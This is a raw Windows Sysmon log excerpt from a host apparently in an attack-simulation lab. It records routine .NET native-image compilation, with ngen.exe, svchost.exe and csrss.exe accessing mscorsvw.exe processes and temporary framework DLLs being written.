13:49:50.135{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91FE-6005-6403-00000000A301}4236C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007739Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:49:50.088{59A5CD1D-91FD-6005-6203-00000000A301}4584C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\11e8-0\Microsoft.Activities.Build.dll2021-01-18 13:49:50.088 10341000x80000000000000007754Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:51.260{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91FF-6005-6803-00000000A301}4448C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007753Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:51.245{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91FF-6005-6803-00000000A301}4448C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007752Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:51.245{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91FF-6005-6803-00000000A301}4448C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007768Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:54.807{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9202-6005-6C03-00000000A301}2244C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007767Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:54.791{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9202-6005-6C03-00000000A301}2244C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007766Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:54.791{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9202-6005-6C03-00000000A301}2244C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007765Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:54.729{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9202-6005-6B03-00000000A301}4768C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007764Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:54.729{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9202-6005-6B03-00000000A301}4768C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007763Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:54.729{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9202-6005-6B03-00000000A301}4768C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007762Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:49:54.666{59A5CD1D-9202-6005-6A03-00000000A301}4480C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1180-0\Microsoft.Build.Conversion.v4.0.dll2021-01-18 13:49:54.666 10341000x80000000000000007761Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:54.541{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9202-6005-6A03-00000000A301}4480C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007760Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:54.526{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9202-6005-6A03-00000000A301}4480C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007759Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:54.526{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9202-6005-6A03-00000000A301}4480C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007758Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:54.385{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9202-6005-6903-00000000A301}5032C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007757Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:54.370{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9202-6005-6903-00000000A301}5032C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007756Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:54.370{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9202-6005-6903-00000000A301}5032C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007755Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:49:54.198{59A5CD1D-91FF-6005-6803-00000000A301}4448C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1160-0\Microsoft.Build.dll2021-01-18 13:49:54.198 10341000x80000000000000007775Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:55.869{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9203-6005-6E03-00000000A301}2116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007774Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:55.854{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9203-6005-6E03-00000000A301}2116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007773Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:55.854{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9203-6005-6E03-00000000A301}2116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007772Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:55.823{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9203-6005-6D03-00000000A301}3028C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007771Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:55.807{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9203-6005-6D03-00000000A301}3028C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007770Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:55.807{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9203-6005-6D03-00000000A301}3028C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007769Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 